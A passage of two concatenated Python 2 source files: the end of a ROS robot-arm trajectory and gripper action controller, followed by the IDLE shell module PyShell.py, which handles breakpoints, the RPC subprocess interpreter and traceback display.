delta = math.fabs(self._gripper_fdbk.position - self._last_gripper_pos)
self._last_gripper_pos = self._gripper_fdbk.position
if (delta > 0.005):
self._last_movement_time = rospy.get_time()
if (rospy.get_time() - self._last_movement_time) > self._gripper_stall_to:
self._gripper_pos_stall=True
else:
self._gripper_pos_stall=False
self._gripper_fdbk.stalled |= self._gripper_pos_stall
self._gripper_result = self._gripper_fdbk
self._gripper_server.publish_feedback(self._gripper_fdbk)
def _command_gripper(self, position):
ang = calc_grip_angle(position)
self._ctl.CommandGripper(ang)
def _check_gripper_state(self):
return (self._gripper_fdbk.stalled or self._gripper_fdbk.reached_goal)
def _on_gripper_action(self, goal):
# Store position and effort from call
# Position to 0:0.165 == close:open
position = goal.command.position
effort = goal.command.max_effort
print position
# Reset feedback/result
self._update_gripper_feedback(position)
# 20 Hz gripper state rate
control_rate = rospy.Rate(20.0)
# Record start time
start_time = rospy.get_time()
def now_from_start(start):
return rospy.get_time() - start
# Continue commanding goal until success or timeout
self._last_movement_time = rospy.get_time()
self._last_gripper_pos = self._gripper_fdbk.position
while ((now_from_start(start_time) < self._gripper_timeout or
self._gripper_timeout < 0.0) and not rospy.is_shutdown()):
if self._gripper_server.is_preempt_requested():
self._ctl.StopGripper()
rospy.loginfo("%s: Gripper Action Preempted" %
(self._gripper_action_name,))
self._gripper_server.set_preempted(self._gripper_result)
return
self._update_gripper_feedback(position)
if self._check_gripper_state():
self._gripper_server.set_succeeded(self._gripper_result)
return
self._command_gripper(position)
control_rate.sleep()
# Gripper failed to achieve goal before timeout/shutdown
self._ctl.StopGripper()
if not rospy.is_shutdown():
rospy.logerr("%s: Gripper Command Not Achieved in Allotted Time" %
(self._gripper_action_name,))
self._update_gripper_feedback(position)
self._gripper_server.set_aborted(self._gripper_result)
def _home_arms(self,cmd):
if (True == cmd.data and self._planner_homing == False):
self._planner_homing = True
b_thread = Thread(target=self._home_arm_planner(), args='')
b_thread.daemon = True
b_thread.start()
def _update_movo_status(self,status):
if (0 != status.dynamic_response) or (False == self._ctl.GetCtlStatus()) or self._arms_homing:
self.estop = True
self._ctl.SetEstop()
self._estop_delay = 100
else:
if (0 == self._estop_delay):
self.estop = False
self._ctl.ClearEstop()
else:
self.estop = True
self._ctl.SetEstop()
self._estop_delay -= 1
def robot_is_enabled(self):
return not self.estop
def clean_shutdown(self):
self._ctl.Stop()
self._alive = False
def _get_trajectory_parameters(self, joint_names, goal):
"""
For each input trajectory, if path, goal, or goal_time tolerances
provided, we will use these as opposed to reading from the
parameter server/dynamic reconfigure
"""
"""
Goal time tolerance - time buffer allowing goal constraints to be met
"""
if goal.goal_time_tolerance:
self._goal_time = goal.goal_time_tolerance.to_sec()
else:
self._goal_time = 1.0
"""
Stopped velocity tolerance - max velocity at end of execution
"""
self._stopped_velocity = 0.5
"""
Path execution and goal tolerances per joint
"""
for jnt in joint_names:
if jnt not in self._joint_names:
rospy.logerr(
"%s: Trajectory Aborted - Provided Invalid Joint Name %s" %
(self._action_name, jnt,))
self._result.error_code = self._result.INVALID_JOINTS
self._server.set_aborted(self._result)
return
"""
Path execution tolerance
"""
self._path_thresh[jnt] = 0.5
if goal.path_tolerance:
for tolerance in goal.path_tolerance:
if jnt == tolerance.name:
self._path_thresh[jnt] = tolerance.position
"""
Goal error tolerance
"""
self._goal_error[jnt] = 0.5
if goal.goal_tolerance:
for tolerance in goal.goal_tolerance:
if jnt == tolerance.name:
self._goal_error[jnt] = tolerance.position
def _get_current_position(self, joint_names):
return self._ctl.GetCurrentJointPosition(joint_names)
def _get_current_velocities(self, joint_names):
return self._ctl.GetCurrentJointVelocity(joint_names)
def _get_current_errors(self, joint_names):
error = self._ctl.GetCurrentJointPositionError(joint_names)
return zip(joint_names, error)
def _update_feedback(self, cmd_point, joint_names, cur_time):
self._fdbk.header.stamp = rospy.Duration.from_sec(rospy.get_time())
self._fdbk.joint_names = joint_names
self._fdbk.desired = cmd_point
self._fdbk.desired.time_from_start = rospy.Duration.from_sec(cur_time)
self._fdbk.actual.positions = self._get_current_position(joint_names)
self._fdbk.actual.time_from_start = rospy.Duration.from_sec(cur_time)
self._fdbk.error.positions = map(operator.sub,
self._fdbk.desired.positions,
self._fdbk.actual.positions
)
self._fdbk.error.time_from_start = rospy.Duration.from_sec(cur_time)
self._server.publish_feedback(self._fdbk)
def _command_stop(self):
self._ctl.SetPositionHold()
self._ctl.ClearPositionHold()
def _command_joints(self, joint_names, point, dimensions_dict):
if self._server.is_preempt_requested() or not self.robot_is_enabled():
rospy.loginfo("%s: Trajectory Preempted" % (self._action_name,))
self._server.set_preempted()
self._command_stop()
return False
deltas = self._get_current_errors(joint_names)
for delta in deltas:
if ((math.fabs(delta[1]) >= self._path_thresh[delta[0]]
and self._path_thresh[delta[0]] >= 0.0)) or not self.robot_is_enabled():
rospy.logerr("%s: Exceeded Error Threshold on %s: %s" %
(self._action_name, delta[0], str(delta[1]),))
self._result.error_code = self._result.PATH_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
self._command_stop()
return False
pos = dict(zip(joint_names, point.positions))
vel = dict(zip(joint_names, [0.0]*len(joint_names)))
acc = dict(zip(joint_names, [0.0]*len(joint_names)))
if dimensions_dict['velocities']:
vel = dict(zip(joint_names, point.velocities))
if dimensions_dict['accelerations']:
acc = dict(zip(joint_names, point.accelerations))
if self._alive:
self._ctl.CommandJoints(pos, vel, acc)
return True
def _check_goal_state(self, joint_names, last):
for error in self._get_current_errors(joint_names):
if (self._goal_error[error[0]] > 0
and self._goal_error[error[0]] < math.fabs(error[1])):
return error[0]
if (self._stopped_velocity > 0.0 and
max([abs(cur_vel) for cur_vel in self._get_current_velocities(joint_names)]) >
self._stopped_velocity):
return False
else:
return True
def _on_trajectory_action(self, goal):
joint_names = goal.trajectory.joint_names
self._get_trajectory_parameters(joint_names, goal)
success,results = self._traj_smoother.ProcessTrajectory(goal.trajectory,
self._get_current_position(joint_names),
False)
if not success:
self._server.set_aborted()
return
"""
Copy the results to variables that make sense namewise
"""
dimensions_dict = results[0]
b_matrix = results[1]
trajectory_points = results[2]
pnt_times = results[3]
num_points = results[4]
"""
Wait for the specified execution time, if not provided use now
"""
start_time = goal.trajectory.header.stamp.to_sec()
now = rospy.get_time()
if start_time == 0.0:
start_time = rospy.get_time()
while start_time > now:
now = rospy.get_time()
"""
Loop until end of trajectory time. Provide a single time step
of the control rate past the end to ensure we get to the end.
Keep track of current indices for spline segment generation
"""
self._ctl.Resume()
control_rate = rospy.Rate(self._trajectory_control_rate)
now_from_start = rospy.get_time() - start_time
end_time = trajectory_points[-1].time_from_start.to_sec()
while (now_from_start < end_time and not rospy.is_shutdown() and
self.robot_is_enabled()):
now = rospy.get_time()
now_from_start = now - start_time
idx = bisect.bisect(pnt_times, now_from_start)
"""
Calculate percentage of time passed in this interval
"""
if idx >= num_points:
cmd_time = now_from_start - pnt_times[-1]
t = 1.0
elif idx >= 0:
cmd_time = (now_from_start - pnt_times[idx-1])
t = cmd_time / (pnt_times[idx] - pnt_times[idx-1])
else:
cmd_time = 0.0
t = 0.0
point = self._traj_smoother.GetBezierPoint(b_matrix,
idx,
t,
cmd_time,
dimensions_dict)
"""
Command Joint Position, Velocity, Acceleration
"""
command_executed = self._command_joints(joint_names, point, dimensions_dict)
self._update_feedback(deepcopy(point), joint_names, now_from_start)
"""
Break the loop if the command cannot be executed
"""
if not command_executed:
return
control_rate.sleep()
"""
Keep trying to meet goal until goal_time constraint expired
"""
last = trajectory_points[-1]
last_time = trajectory_points[-1].time_from_start.to_sec()
end_angles = dict(zip(joint_names, last.positions))
while (now_from_start < (last_time + self._goal_time)
and not rospy.is_shutdown() and self.robot_is_enabled()):
if not self._command_joints(joint_names, last, dimensions_dict):
return
now_from_start = rospy.get_time() - start_time
self._update_feedback(deepcopy(last), joint_names,
now_from_start)
control_rate.sleep()
now_from_start = rospy.get_time() - start_time
self._update_feedback(deepcopy(last), joint_names,
now_from_start)
"""
Verify goal constraint
"""
result = self._check_goal_state(joint_names, last)
if result is True:
rospy.loginfo("%s: Joint Trajectory Action Succeeded for %s arm" %
(self._action_name, self._prefix))
self._result.error_code = self._result.SUCCESSFUL
self._server.set_succeeded(self._result)
elif result is False:
rospy.logerr("%s: Exceeded Max Goal Velocity Threshold for %s arm" %
(self._action_name, self._prefix))
self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
else:
rospy.logerr("%s: Exceeded Goal Threshold Error %s for %s arm" %
(self._action_name, result, self._prefix))
self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
self._command_stop()
self._ctl.Pause()
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import subprocess
import macosxSupport
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
from utils import tb_print_list
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno,
file=None, line=None):
if file is None:
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename,
lineno, file=file, line=line))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
"""Convert a tuple of ranges returned by Text.tag_ranges to
line numbers."""
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(str(ranges[index])))
end = int(float(str(ranges[index+1])))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
rpcclt = None
rpcproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcproc = subprocess.Popen([sys.executable] + args[1:])
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'vidle.PyShell':
command = "__import__('vidle.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def get_restart_line(self):
halfbar = ((int(self.tkconsole.width) - 16) // 2) * '='
return halfbar + ' RESTART ' + halfbar
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
console.write(self.get_restart_line())
console.text.tag_add("restart", "end - 1 line")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated and collect status."
if sys.platform[:3] == 'win':
try:
self.rpcproc.kill()
except WindowsError:
pass
else:
self.rpcproc.kill()
self.rpcproc.wait()
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exceptiopn. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self, temp_filename=None):
"""Extend base class method to reset output properly and print an
customized traceback."""
self.tkconsole.resetoutput()
self.checklinecache()
typ, value, tb = sys.exc_info()
sys.last_type = typ
sys.last_value = value
sys.last_traceback = tb
tblist = traceback.extract_tb(tb)
del tblist[:1]
sys.stderr.write('\nTraceback (most recent call last):\n')
if temp_filename is not None:
# Replace the name of the temporary file by 'Untitled'
main_fname = 'Untitled'
new_tb = []
for t in tblist:
fname = main_fname if t[0] == temp_filename else t[0]
new_tb.append((fname, ) + t[1:])
tblist = new_tb
else:
main_fname = tblist[0][0]
tb_print_list(tblist, main_fname, sys.stdout, sys.stderr)
lines = traceback.format_exception_only(typ, value)
map(sys.stderr.write, lines)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code, tempname=None):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code, tempname), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback(tempname)
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
